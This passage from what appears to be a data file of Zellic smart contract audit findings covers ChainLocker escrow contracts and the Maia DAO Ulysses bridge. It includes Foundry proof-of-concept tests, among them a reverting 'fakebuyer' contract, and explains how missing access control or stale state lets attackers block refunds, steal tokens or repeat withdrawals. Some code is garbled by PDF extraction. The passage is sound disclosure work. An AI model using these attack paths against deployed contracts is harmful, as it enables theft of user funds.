seller) revert EthLocker_NotSeller(); if (!openOffer) revert EthLocker_OnlyOpenOffer(); /) reset 'deposited' and 'buyer' variables if 'seller' passed 'buyer' as '_depositor' if (_depositor =) buyer) { delete deposited; delete buyer; emit EthLocker_BuyerUpdated(address(0)); } uint256 _depositAmount = amountDeposited[_depositor]; /) regardless of whether '_depositor' is 'buyer', if the address has a positive deposited balance, return it to them if (_depositAmount > 0) { delete amountDeposited[_depositor]; safeTransferETH(_depositor, _depositAmount); emit EthLocker_DepositedAmountTransferred( _depositor, _depositAmount ); Zellic ChainLocker LLC } } The vulnerability can be demonstrated using the following Foundry test code: function testfakebuyerrejection() public{ fakebuyer fakebuyer1 = new fakebuyer(); address seller1 = vm.addr(0x1339); vm.deal(address(fakebuyer1), 10 ether); vm.deal(seller1, 10 ether); openEscrowTest = new EthLocker( true, true, 0, 0, 0, 10 ether, 20 ether, expirationTime, payable(seller1), buyer, address(0) ); address payable _newContract = payable(address(openEscrowTest)); vm.prank(address(fakebuyer1)); (bool _success, ) = _newContract.call{value: 10 ether}(\u201d\u201d); vm.startPrank(seller1); openEscrowTest.rejectDepositor(payable(fakebuyer1)); /) This call would revert. } /) The fake buyer contract contract fakebuyer{ constructor() {} fallback() payable external { revert(); } } Zellic ChainLocker LLC A similar issue arises in TokenLocker if any ERC-777/ERC-677 (extensions of ERC-20) tokens are used, as the buyer can revert during the callback of the safeTransfer call and prevent themselves from being rejected. Buyers can prevent themselves from being rejected by the seller. Implement a shift from the push method to the pull pattern. In other words, rather than executing fund transfers within the rejectDepositor function, it is possible to adopt a mechanism where a mapping is updated for the depositor that would indicate the amount of funds they are authorized to withdraw. Subsequently, the depositor can engage a distinct function that leverages this mapping to execute the fund transfer to themselves. This approach ensures that a buyer\u2019s actions cannot obstruct the reject Depositor call. ChainLocker LLC acknowledged this finding and implemented a fix in commits fe6a23a4 , 78339ea0, 2c981487 and 142300b6 Zellic ChainLocker LLC", + "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Irrevertible loss of tokens", + "labels": [ + "Zellic" + ], + "body": "Target: TokenLocker, EthLocker Category: Business Logic Likelihood: Low Severity: High : Medium When a seller decides to reject a buyer, the designated buyer address is set to address (0). However, complications may arise in scenarios where a buyer employs different addresses to send tokens into the locker. In such cases, there is a possibility that residual tokens could remain within the contract without being fully returned to the buyer. In the event that the timestamp surpasses the defined expirationTime, a potentially malicious third party could cause an irreversible loss of tokens. By invoking the check IfExpired function, any remaining funds in the locker could be transferred to address (0). This action holds true in instances where the locker allows refunds. Yet, even in cases where the locker does not facilitate refunds, a substantial portion of funds might still be at risk of loss. 
Regardless of the circumstances, the outcome could involve an irreversible loss of tokens. The vulnerability can be demonstrated using the following Foundry test code: function testrejectandtokenloss() public { address buyer1 = vm.addr(0x1337); address buyer2 = vm.addr(0x1338); address seller1 = vm.addr(0x1339); vm.deal(buyer1, 10 ether); vm.deal(buyer2, 10 ether); vm.deal(seller1, 10 ether); openEscrowTest = new EthLocker( true, true, 0, 0, 0, 10 ether, 20 ether, expirationTime, payable(seller1), buyer, address(0) ); address payable _newContract = payable(address(openEscrowTest)); vm.prank(buyer1); (bool _success, ) = _newContract.call{value: 5 ether}(\u201c\u201d); vm.prank(buyer2); (_success, ) = _newContract.call{value: 10 ether}(\u201c\u201d); vm.startPrank(seller1); openEscrowTest.rejectDepositor(payable(buyer2)); vm.warp(block.timestamp + expirationTime); openEscrowTest.checkIfExpired(); } There might be an irreversible loss of tokens. It is recommended to check the buyer address before transferring funds to it. ChainLocker LLC acknowledged this finding and implemented a fix in commits 6305b605 and df8d0003 Zellic ChainLocker LLC", "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" }, { "title": "3.5 The variable buyerApproved is not set to false if the buyer is rejected", "labels": [ "Zellic" ], "body": "Target: TokenLocker and EthLocker Category: Business Logic Likelihood: Medium Severity: Medium : Medium When a buyer is rejected by the seller, it is recommended to set the variable buyerApproved to false. If not, the function execute is still callable, even if there is no buyer in the system. The function execute might be called even if there is no buyer. We recommend setting buyerApproved to false in rejectDepositor if _depositor == buyer. ChainLocker LLC acknowledged this finding and implemented a fix in commits ad330599 and 31904b2f Zellic ChainLocker LLC", "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" }, { "title": "3.6 Griefing in checkIfExpired", "labels": [ "Zellic" ], "body": "Target: TokenLocker, EthLocker Category: Business Logic Likelihood: Medium Severity: Medium : Medium If a locker is nonrefundable and expirationTime has passed, it is possible to call checkIfExpired to transfer the deposit amount to the seller and any remaining funds to the buyer. It is possible for the buyer or the seller to intentionally revert this transaction. The vulnerability here is similar to the one shown in 3.3. In the case of EthLocker, an issue arises when safeTransferETH is called, as it would internally call the fallback function if the buyer/seller is a contract, and a buyer/seller can purposefully call revert in the fallback function, causing the entire call to be reverted. A similar issue arises in TokenLocker if any ERC-777/ERC-677 (extensions of ERC-20) tokens are used, as the buyer/seller can revert during the callback of the safeTransfer call. Both the buyer and the seller possess the capability to impede the transfer of funds in checkIfExpired if the locker is nonrefundable. Implement a shift from the push method to the pull pattern as recommended in 3.3.
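For reference, here is a minimal sketch of the pull pattern recommended in 3.3 and here, with hypothetical names: rejectDepositor only records a credit, and the transfer happens in a separate withdrawal call, so a reverting fallback can only block the caller's own funds:

```solidity
// Sketch only: credit-then-withdraw instead of pushing ETH during rejection.
mapping(address => uint256) public withdrawableFunds; // hypothetical storage

function rejectDepositor(address payable _depositor) external {
    // ...existing seller checks and buyer/deposited resets...
    uint256 amount = amountDeposited[_depositor];
    if (amount > 0) {
        delete amountDeposited[_depositor];
        withdrawableFunds[_depositor] += amount; // record a credit, no transfer
    }
}

function withdrawRejectedDeposit() external {
    uint256 amount = withdrawableFunds[msg.sender];
    require(amount > 0, "nothing to withdraw");
    withdrawableFunds[msg.sender] = 0; // zero out before transfer to block reentrancy
    safeTransferETH(msg.sender, amount); // a revert here only affects the caller
}
```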
ChainLocker LLC acknowledged this finding and implemented a fix in commits fe6a23a4 and 2c981487 Zellic ChainLocker LLC", + "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Missing access control for Multicall", + "labels": [ + "Zellic" + ], + "body": "Target: MulticallRootRouter Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The function anyExecuteSignedDepositMultiple lacks the requiresAgent modifier, which makes it callable by anyone. function anyExecuteSignedDepositMultiple( bytes1 funcId, bytes memory rlpEncodedData, DepositMultipleParams calldata, address userAccount, uint24 fromChainId ) external payable returns (bool success, bytes memory result) {...))} Depending on the funcId, multiple things can happen, but IVirtualAccount(userAcco unt).call(calls) is always called on the userAccount input. If this is an actual VirtualAccount implementation, the call() function will revert, since it is protected by a requiresApprovedCaller modifier, and this approval is toggled on and off by RootBridgeAgent.sol calling IPort(localPortAddress).toggleVirtualAcco untApproved(...))) before and after the call to anyExecuteSignedDepositMultiple. An attacker can pick their own contract that pretends to be a VirtualAccount and make calls to, for example, call(...))) or withdrawERC20(...))) successful. This in itself is not helpful for an attacker, but for funcId 0x02 and 0x03, there are calls to the internal functions _approveAndCallOut(...))) and _approveMultipleAndCallOut( ...))). The attacker controls all parameters going into these functions. This ends up transferring tokens from Root to Branch, then sending or minting money to the re- ceiver. Using a fake VirtualAccount contract, a user can steal tokens from the Root by directly calling anyExecuteSignedDepositMultiple(...))). Note that this full chain is hard to ver- ify because it relies on several encoded structures and dependencies, so there is no proof of concept for this attack. Zellic Maia DAO Add a requiresAgent modifier to the anyExecuteSignedDepositMultiple function. This issue has been acknowledged by Maia DAO, and fixes were implemented in the following commits: ca057685 42c35522 Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Multitoken lacks validations", + "labels": [ + "Zellic" + ], + "body": "Target: ERC4626MultiToken Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Several functions within ERC4626MultiToken.sol lack necessary validations, which can result in the loss of funds or broken contracts. This contract is similar to the Solmate implementation of ERC4626, but it differs in that it allows for the trading of multiple (weighted) assets instead of just one. This is implemented by replacing the uint256 assets argument with a uint256[] memory assetsAmounts array. The deposit function calls multiple functions, each of which iterates based on the length of the assetsAmounts input array. However, this array is never checked to en- sure that it is equal to assets.length. The function then calculates the amount of shares by calling previewDeposit(assetsAmounts), which is a wrapper for convertToS hares. 
function convertToShares(uint256[] memory assetsAmounts) public view virtual returns (uint256 shares) { uint256 _totalWeights = totalWeights; uint256 length = assetsAmounts.length; shares = type(uint256).max; for (uint256 i = 0; i < length;) { uint256 share = assetsAmounts[i].mulDiv(_totalWeights, weights[i]); if (share < shares) shares = share; unchecked { i++; // @audit ++i } } } Here, the shares variable is calculated based on the smallest possible share = assetsAmounts[i] * _totalWeights / weights[i]. After this, the receiveAssets(assetsAmounts) function is called to actually transfer the assets to the contract. However, if assetsAmounts.length == 0, shares will be type(uint256).max. Lastly, it mints the amount of shares and awards this to the receiver. Upon calling the redeem function, a user can present their shares and get back a mix of assets based on the weights, despite only depositing a subset of the assets (or none at all). Additionally, the constructor does not verify that weights are nonzero nor that the lengths of assets and weights are equal. A test case that proves this behavior was implemented inside UlyssesTokenHandler.t.sol,
Once the funds have been successfully withdrawn, the deposit data is not reset or modified in any way, which means that it is possible to call the function again with the same identifier. function redeemDeposit(uint32 _depositNonce) external lock { // Update Deposit if (getDeposit[_depositNonce].status != DepositStatus.Failed) { revert DepositRedeemUnavailable(); } _redeemDeposit(_depositNonce); } function _redeemDeposit(uint32 _depositNonce) internal { // Get Deposit Deposit storage deposit = _getDepositEntry(_depositNonce); // Transfer token to depositor / user for (uint256 i = 0; i < deposit.hTokens.length;) { if (deposit.amounts[i] - deposit.deposits[i] > 0) { IPort(localPortAddress).bridgeIn( deposit.owner, deposit.hTokens[i], deposit.amounts[i] - deposit.deposits[i] ); } IPort(localPortAddress).withdraw(deposit.owner, deposit.tokens[i], deposit.deposits[i]); unchecked { ++i; } } IPort(localPortAddress).withdraw(deposit.owner, address(wrappedNativeToken), deposit.depositedGas); } If a cross-chain call fails and the status of the deposit is set to Failed, the depositor will be able to repeatedly withdraw all the _underlyingAddress tokens deposited to the localPortAddress contract. After a successful withdrawal, update the status of the deposit and reset the amounts of deposited funds or delete the deposit information from storage altogether. This will help prevent any repeated withdrawal of funds and ensure that the contract state accurately reflects the state of the deposits. This issue has been acknowledged by Maia DAO, and a fix was implemented in commit a0dd0311.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.5 Broken fee sweep", "labels": [ "Zellic" ], "body": "Target: RootBridgeAgent Category: Coding Mistakes Likelihood: High Severity: High : Critical Whenever execution gas is paid in _payExecutionGas(...), a fee is taken and stored in the global accumulatedFees. To withdraw these fees, the function sweep() is called by the designated daoAddress, and the fees are then supposed to be reset afterwards. function sweep() external { if (msg.sender != daoAddress) revert UnauthorizedCaller(); accumulatedFees = 0; SafeTransferLib.safeTransferETH(daoAddress, accumulatedFees); } However, accumulatedFees is reset to zero before the token transfer, so the transfer sends nothing. Fees are stuck in the RootBridgeAgent. It is impossible to extract these from the contract. Move the accumulatedFees reset below the transfer call, but also consider the need for reentrancy guards. A temporary variable was introduced to mirror the accumulated fees, and the global is still reset before the transfer to avoid reentrancy guards. This issue has been acknowledged by Maia DAO, and a fix was implemented in commit 23c47122.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.6 Asset removal is broken", "labels": [ "Zellic" ], "body": "Target: UlyssesToken.sol Category: Coding Mistakes Likelihood: High Severity: High : High The function removeAsset(address asset) removes an asset from the global assets[] and weights[] arrays and updates some globals.
function removeAsset(address asset) external nonReentrant onlyOwner { // No need to check if index is 0, it will underflow and revert if it is 0 uint256 assetIndex = assetId[asset] - 1; if (assets.length == 1) revert CannotRemoveLastAsset(); // Remove asset from array for (uint256 i = assetIndex; i < assets.length; i++) { assets[i] = assets[i + 1]; weights[i] = weights[i + 1]; } totalWeights -= weights[assetIndex]; assets.pop(); weights.pop(); assetId[asset] = 0; ... } This is done by looking up the index of the asset in assetId, then moving all assets and weights down by one index. Finally, totalWeights is supposed to be reduced by the weight of the removed asset, and the duplicated value at the end is popped off. However, there are multiple issues with this implementation. The loop increments i to assets.length but indexes into i + 1, which will go beyond the length of the array and revert. Global totalWeights is reduced after the target asset and weight have been overwritten, reducing totalWeights by a different weight than intended. The assetId mapping is supposed to point to the index of a given asset, but these indices are not updated when all the positions shift around. While not unsolvable, adding too many assets can make it impossible to remove one of the lower-index assets due to gas cost. Removing higher-index assets would still be possible, and multiple such operations could reduce the gas cost for a lower index too. It is impossible to remove assets. Even if it worked, the weights would be wrong after removing an asset. Due to assetId not updating, removing an asset in the future will remove the wrong asset \u2014 or cause the transaction to revert. Loop to assets.length - 1. Update totalWeights before removing the weights. Update the assetId mapping. Create test cases for the function. This issue has been acknowledged by Maia DAO, and fixes were implemented in the following commits: 3d317ac6, f116e00e.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.7 Unsupported function codes", "labels": [ "Zellic" ], "body": "Target: CoreBranchRouter Category: Coding Mistakes Likelihood: High Severity: High : High Several functions from CoreBranchRouter perform an external call to IBridgeAgent(localBridgeAgentAddress).performSystemCallOut; below is an example of this kind of call. The data generated from user input is encoded with a byte responsible for the type of function to be executed as a result of cross-chain communication. In this case, the byte 0x01 is responsible for adding a new global token. contract CoreBranchRouter is BaseBranchRouter { ... function addGlobalToken( address _globalAddress, uint256 _toChain, uint128 _remoteExecutionGas, uint128 _rootExecutionGas ) external payable { bytes memory data = abi.encode(address(this), _globalAddress, _toChain, _rootExecutionGas); bytes memory packedData = abi.encodePacked(bytes1(0x01), data); IBridgeAgent(localBridgeAgentAddress).performSystemCallOut{value: msg.value}( msg.sender, packedData, _remoteExecutionGas ); } ... } The performSystemCallOut function encodes the user\u2019s data using a byte 0x00 that determines the type of function to be called within the RootBridgeAgent contract. The resulting encoded data is then passed for execution.
function performSystemCallOut(address depositor, bytes calldata params, uint128 rootExecutionGas) external payable lock requiresRouter requiresFallbackGas { bytes memory data = abi.encodePacked(bytes1(0x00), depositNonce, params, msg.value.toUint128(), rootExecutionGas); _depositAndCall(depositor, data, address(0), address(0), 0, 0); // -> IRootBridgeAgent(rootBridgeAgentAddress).anyExecute(_callData); } During execution, the data will be decoded in the anyExecute function. The 0x00 byte corresponds to the execution of the IRouter(localRouterAddress).anyExecuteResponse function, which will be called with the decoded data. contract RootBridgeAgent is IRootBridgeAgent { function anyExecute(bytes calldata data) external virtual requiresExecutor returns (bool success, bytes memory result) { ... bytes1 flag = data[0]; if (flag == 0x00) { IRouter(localRouterAddress).anyExecuteResponse(bytes1(data[5]), data[6:data.length - PARAMS_GAS_IN], fromChainId); } else if (flag == 0x01) { IRouter(localRouterAddress).anyExecute(bytes1(data[5]), data[6:data.length - PARAMS_GAS_IN], fromChainId); emit LogCallin(flag, data, fromChainId); } ... } ... } But the current implementation of localRouterAddress.anyExecuteResponse supports only the 0x02 and 0x03 function IDs. Therefore, for the above example with addGlobalToken (0x01 funcId), the anyExecuteResponse will return a false status with an unknown selector message. contract CoreRootRouter is IRootRouter, Ownable { ... function anyExecuteResponse(bytes1 funcId, bytes calldata encodedData, uint24 fromChainId) external payable override requiresAgent returns (bool, bytes memory) { /// FUNC ID: 2 (_addLocalToken) if (funcId == 0x02) { (address underlyingAddress, address localAddress, string memory name, string memory symbol) = abi.decode(encodedData, (address, address, string, string)); _addLocalToken(underlyingAddress, localAddress, name, symbol, fromChainId); emit LogCallin(funcId, encodedData, fromChainId); /// FUNC ID: 3 (_setLocalToken) } else if (funcId == 0x03) { (address globalAddress, address localAddress) = abi.decode(encodedData, (address, address)); _setLocalToken(globalAddress, localAddress, fromChainId); emit LogCallin(funcId, encodedData, fromChainId); /// Unrecognized Function Selector } else { return (false, \"unknown selector\"); } return (true, \"\"); } ... } Another example of a function from CoreBranchRouter that cannot be executed is syncBridgeAgent. This function corresponds to an identifier 0x04 that is also not supported by anyExecuteResponse. contract CoreBranchRouter is BaseBranchRouter { ... function syncBridgeAgent(address _newBridgeAgentAddress, address _rootBridgeAgentAddress) external payable { if (!IPort(localPortAddress).isBridgeAgent(_newBridgeAgentAddress)) { revert UnrecognizedBridgeAgent(); } bytes memory data = abi.encode(_newBridgeAgentAddress, _rootBridgeAgentAddress); bytes memory packedData = abi.encodePacked(bytes1(0x04), data); IBridgeAgent(localBridgeAgentAddress).performSystemCallOut{value: msg.value}(msg.sender, packedData, 0); } ... } Calling functions that are not supported by the final executor can result in the loss of funds paid for gas and can disrupt the operation of user applications waiting for successful cross-chain function execution. The anyExecute function supports function IDs 0x04 and 0x01.
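To make the routing mismatch concrete, here is a minimal, self-contained sketch (an editorial illustration only; the contract and function names are simplified stand-ins for the snippets above, not the actual Ulysses implementation):
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    /// Sketch of the mismatch: a payload flagged 0x00 is dispatched to the
    /// response handler, but that handler only recognizes funcIds 0x02 and 0x03.
    contract FuncIdRoutingSketch {
        // Stand-in for CoreRootRouter.anyExecuteResponse
        function executeResponse(bytes1 funcId) public pure returns (bool ok, string memory err) {
            if (funcId == 0x02 || funcId == 0x03) return (true, "");
            return (false, "unknown selector");
        }

        // Stand-in for the flag-0x00 path taken by performSystemCallOut
        function dispatch(bytes1 funcId) external pure returns (bool ok) {
            (ok, ) = executeResponse(funcId);
            // dispatch(0x01) and dispatch(0x04) return false: the gas for the
            // cross-chain call is spent, but nothing is executed on the root chain.
        }
    }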
In order to call this function as a result of cross-chain communication, the addGlobalToken and syncBridgeAgent functions should call IBridgeAgent(localBridgeAgentAddress).performCallOut instead of IBridgeAgent(localBridgeAgentAddress).performSystemCallOut. This ensures that the 0x01 flag is encapsulated in the data, allowing the IRouter(localRouterAddress).anyExecute function to be called upon decoding. function anyExecute(bytes1 funcId, bytes calldata encodedData, uint24 fromChainId) external payable override requiresAgent returns (bool, bytes memory) { /// FUNC ID: 1 (_addGlobalToken) if (funcId == 0x01) { (address branchRouter, address globalAddress, uint24 toChain, uint128 remoteExecutionGas) = abi.decode(encodedData, (address, address, uint24, uint128)); _addGlobalToken(remoteExecutionGas, globalAddress, branchRouter, toChain); emit LogCallin(funcId, encodedData, fromChainId); /// FUNC ID: 4 (_syncBranchBridgeAgent) } else if (funcId == 0x04) { (address newBranchBridgeAgent, address rootBridgeAgent) = abi.decode(encodedData, (address, address)); _syncBranchBridgeAgent(newBranchBridgeAgent, rootBridgeAgent, fromChainId); emit LogCallin(funcId, encodedData, fromChainId); /// Unrecognized Function Selector } else { return (false, \"unknown selector\"); } return (true, \"\"); } This issue has been acknowledged by Maia DAO, and a fix was implemented in commit 92ef9cce.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.8 Missing access control on anyExecuteNoSettlement", "labels": [ "Zellic" ], "body": "Target: CoreBranchRouter Category: Coding Mistakes Likelihood: High Severity: High : High The anyExecuteNoSettlement function is responsible for executing a cross-chain request. It is supposed to be called from the anyExecute function in the BranchBridgeAgent contract. But since the function has no caller verification, anyone can execute it. function anyExecuteNoSettlement(bytes memory _data) external virtual override returns (bool success, bytes memory result) { if (_data[0] == 0x01) { (, address globalAddress, string memory name, string memory symbol, uint128 gasToBridgeOut) = abi.decode(_data, (bytes1, address, string, string, uint128)); _receiveAddGlobalToken(globalAddress, name, symbol, gasToBridgeOut); } else if (_data[0] == 0x01) { // @audit unreachable branch (, address newBridgeAgentFactoryAddress) = abi.decode(_data, (bytes1, address)); _receiveAddBridgeAgentFactory(newBridgeAgentFactoryAddress); /// Unrecognized Function Selector } else { return (false, \"unknown selector\"); } return (true, \"\"); } Note that there is an error in the current implementation of the anyExecuteNoSettlement function that does not allow calling the function _receiveAddBridgeAgentFactory, since the else if branch cannot be executed. This is because both branches check the equality of _data[0] to 0x01, and the first if will be executed in priority. Since there is no caller verification on the anyExecuteNoSettlement function, any caller is able to execute the _receiveAddGlobalToken function, manipulate the input parameters globalAddress, name, symbol, and gasToBridgeOut, and pass them to the performSystemCallOut function, which performs a call to the AnycallProxy contract for cross-chain messaging.
function _receiveAddGlobalToken( address _globalAddress, string memory _name, string memory _symbol, uint128 _rootExecutionGas ) internal { // Create Token ERC20hToken newToken = IFactory(hTokenFactoryAddress).createToken(_name, _symbol); // Encode Data bytes memory data = abi.encode(_globalAddress, newToken); // Pack FuncId bytes memory packedData = abi.encodePacked(bytes1(0x03), data); // Send Cross-Chain request IBridgeAgent(localBridgeAgentAddress).performSystemCallOut{value: _rootExecutionGas}( address(this), packedData, 0 ); } Next, as a result of cross-chain communication, the anyExecuteResponse function will be executed and the globalAddress, controlled by the anyExecuteNoSettlement caller, will be passed to the IPort(rootPortAddress).setLocalAddress function. contract CoreRootRouter is IRootRouter, Ownable { ... function anyExecuteResponse(bytes1 funcId, bytes calldata encodedData, uint24 fromChainId) external payable override requiresAgent returns (bool, bytes memory) { ... } else if (funcId == 0x03) { (address globalAddress, address localAddress) = abi.decode(encodedData, (address, address)); _setLocalToken(globalAddress, localAddress, fromChainId); ... } function _setLocalToken(address _globalAddress, address _localAddress, uint24 _toChain) internal { IPort(rootPortAddress).setLocalAddress(_globalAddress, _localAddress, _toChain); } } The setLocalAddress function currently allows modifications to the getGlobalAddressFromLocal and getLocalAddressFromGlobal mappings without any checks. This means that the existing getLocalAddressFromGlobal[_fromChain][_globalAddress] value can be overwritten. function setLocalAddress(address _globalAddress, address _localAddress, uint24 _fromChain) external requiresCoreBridgeAgent { getGlobalAddressFromLocal[_fromChain][_localAddress] = _globalAddress; getLocalAddressFromGlobal[_fromChain][_globalAddress] = _localAddress; } The requiresBridgeAgent modifier should be used to prevent anyone from calling the anyExecuteNoSettlement function. The requiresBridgeAgent modifier was added in commit c73b4c5d. The implementation of the anyExecuteNoSettlement function was fixed in commits d588989e and 92ef9cce.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.9 The protocol fee from pools will be claimed to zero address", "labels": [ "Zellic" ], "body": "Target: UlyssesFactory Category: Coding Mistakes Likelihood: High Severity: High : High The UlyssesFactory contract enables the creation of new pool contracts and sets its own address as the factory address. Protocol fees collected from the pool contracts are transferred to the owner of the factory. However, the _initializeOwner function is not called in the factory contract, resulting in factory.owner() returning address(0). function claimProtocolFees() external nonReentrant onlyOwner returns (uint256 claimed) { claimed = getProtocolFees(); if (claimed > 0) { asset.safeTransfer(factory.owner(), claimed); } } Since the owner of the UlyssesFactory contract is not set during its creation, it will not be possible to change the owner at a later time. This means that it will also not be possible to withdraw the protocol fee from pool contracts, as the factory.owner() function will return the zero address, address(0). In addition, the fee amount cannot be changed, because setProtocolFee is allowed to be called only by factory.owner().
function setProtocolFee(uint256 _protocolFee) external nonReentrant { if (msg.sender != factory.owner()) revert Unauthorized(); // Revert if the protocol fee is larger than 1% if (_protocolFee > MAX_PROTOCOL_FEE) revert InvalidFee(); protocolFee = _protocolFee; } Pass the owner\u2019s address to the UlyssesFactory constructor and set the owner using the _initializeOwner function. This issue has been acknowledged by Maia DAO, and a fix was implemented in commit bd2054cb.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.10 Unlimited cross-chain asset transfer without deposit requirement", "labels": [ "Zellic" ], "body": "Target: RootBridgeAgent Category: Coding Mistakes Likelihood: High Severity: High : High The callOutAndBridge function facilitates the transfer of assets from the root chain to the branch omnichain environment and creates a Settlement object that contains information about the amount of tokens and the addresses involved in the transfer. In the event that the cross-chain call fails or reverts, the anyFallback function is called to reopen the Settlement object and set its status to Pending. This enables a retry through the clearSettlement function. function clearSettlement(uint32 _settlementNonce, uint128 _remoteExecutionGas) external payable { // Update User Gas available. if (initialGas == 0) { userFeeInfo.depositedGas = uint128(msg.value); userFeeInfo.gasToBridgeOut = _remoteExecutionGas; } // Clear Settlement with updated gas. _clearSettlement(_settlementNonce); } The clearSettlement function initiates resending of a failed cross-chain transfer by calling the internal _clearSettlement function. The status of the settlement object is checked to ensure that it is currently in a Pending state before attempting to resend. If the resend is successful, the status of the temporary settlement variable is set to Success. However, it is important to note that the status of the actual Settlement object in storage is not changed during the execution of this function and will remain as Pending. function _clearSettlement(uint32 _settlementNonce) internal requiresFallbackGas { // Get settlement Settlement memory settlement = _getSettlementEntry(_settlementNonce); // Require Status to be Pending require(settlement.status == SettlementStatus.Pending); // Update Settlement settlement.status = SettlementStatus.Success; // Slice last 4 bytes calldata uint128 prevGasToBridgeOut = uint128(bytes16(BytesLib.slice(settlement.callData, settlement.callData.length - 16, 16))); // abi encodePacked bytes memory newGas = abi.encodePacked(prevGasToBridgeOut + _manageGasOut(settlement.toChain)); // overwrite last 16 bytes of callData for (uint256 i = 0; i < newGas.length;) { settlement.callData[settlement.callData.length - 16 + i] = newGas[i]; unchecked { ++i; } } // Set Settlement getSettlement[_settlementNonce].callData = settlement.callData; // Retry call with additional gas _performCall(settlement.callData, settlement.toChain); } Because the Pending status is never cleared in storage, users will be able to move assets from the root chain to the branch omnichain environment without depositing additional funds. We recommend implementing the status change as shown below: function _clearSettlement(uint32 _settlementNonce) internal requiresFallbackGas { // Get settlement Settlement memory settlement = _getSettlementEntry(_settlementNonce); // Require Status to be Pending require(settlement.status == SettlementStatus.Pending); // Update Settlement settlement.status = SettlementStatus.Success; getSettlement[_settlementNonce].status = SettlementStatus.Success; ... This issue has been acknowledged by Maia DAO, and a fix was implemented in commit 073012d1.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.11 ChainId type confusion", "labels": [ "Zellic" ], "body": "Target: CoreBranchRouter, RootBridgeAgent, RootPort Category: Coding Mistakes Likelihood: Low Severity: High : Medium To distinguish between the various chains being used, each chain is assigned a unique identifier that determines where cross-chain calls will be executed. Throughout the code, the chain identifier is represented as both uint256 and uint24, which can create issues when data is packed and unpacked without an explicit cast. This occurs in several locations, as illustrated by the following examples: CoreBranchRouter CoreBranchRouter.sol -> addGlobalToken(...) has _toChain represented as uint256. These parameters are then encoded with abi.encode and passed down to be called cross chain. function addGlobalToken( address _globalAddress, uint256 _toChain, uint128 _remoteExecutionGas, uint128 _rootExecutionGas ) external payable { // Encode Call Data bytes memory data = abi.encode(address(this), _globalAddress, _toChain, _rootExecutionGas); ... } It ends up here, in CoreRootRouter->anyExecute, function anyExecute(bytes1 funcId, bytes calldata encodedData, uint24 fromChainId) external payable override requiresAgent returns (bool, bytes memory) { /// FUNC ID: 1 (_addGlobalToken) if (funcId == 0x01) { (address branchRouter, address globalAddress, uint24 toChain, uint128 remoteExecutionGas) = abi.decode(encodedData, (address, address, uint24, uint128)); ...} ... } where it is decoded with abi.decode as a uint24. Since the non-packed version of abi.encode is used, this will work until _toChain some day is picked to be too large to be represented as uint24, and then the anyExecute call will start to revert. RootBridgeAgent The function _payExecutionGas(..., uint24 _fromChain, uint256 _toChain) uses both uint24 and uint256 to represent chains in the same function signature. However, other functions tend to use uint24 to represent it, including functions that do slicing of the input parameters by directly accessing the bytes. RootPort The internal function _getLocalToken looks up a local token address on a different chain, function _getLocalToken(address _localAddress, uint256 _fromChain, uint24 _toChain) internal view returns (address) { address globalAddress = getGlobalAddressFromLocal[_fromChain][_localAddress]; return getLocalAddressFromGlobal[_toChain][globalAddress]; } where _toChain is a uint24, but the mapping getLocalAddressFromGlobal is defined as mapping(uint256 => mapping(address => address)) public getLocalAddressFromGlobal. Compilers are not able to effectively reason about type safety across abi-encoding and -decoding. In situations where the data types are out of sync, and the target type cannot fit the input, the decoding call will revert. This will happen if, for example, upper bits of chainId are used to store data or the number of chains goes beyond 2^24 (unlikely). Not settling on a single representation for the same thing can create confusion for future development. When doing cross-chain development, it is even more important to make sure everything is synchronized and well-understood across all the chains. Consider using a canonical representation for all logical measurements and identifiers in the codebase. This includes items such as chainId, fees, gas, and other similar values. When using abi.encode, data is slotted into bytes32, which means that there is no advantage in using smaller data types unless they are packed. To ensure that cross-chain data encoding and decoding are working as expected, it is recommended to implement test cases specifically for this purpose. ChainId is now consistently uint24 except for the mappings in the root port. This is done generally to make cross-chain calls cheaper, except in the CoreRootRouter, which uses abi.encode for simplicity. (All BridgeAgents use abi.encodePacked to decrease message size.) This issue has been acknowledged by Maia DAO, and fixes were implemented in the following commits: 4a120be7, 9330339a.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.12 Incorrect accounting of total and strategies debt", "labels": [ "Zellic" ], "body": "Target: BranchPort Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The approved strategy contract is authorized to borrow assets via the manage function and repay debt via the replenishReserves function, but only up to the amount of reservesLacking. The _strategy address, which will return debt, amount of tokens, and _token address, is controlled by the caller of the replenishReserves function. The reservesLacking value shows the shortage of tokens needed to reach the minimum reserve amount. If reservesLacking is greater than the _amount value, then the _amount will be withdrawn; otherwise, the reservesLacking value will be withdrawn. Regardless of the withdrawal amount, both the getPortStrategyTokenDebt and getStrategyTokenDebt will be reduced by the _amount value. Additionally, the value of the debt strategy will be reduced, not for the strategy that returned the funds but for the strategy that called the function. function replenishReserves(address _strategy, address _token, uint256 _amount) external { if 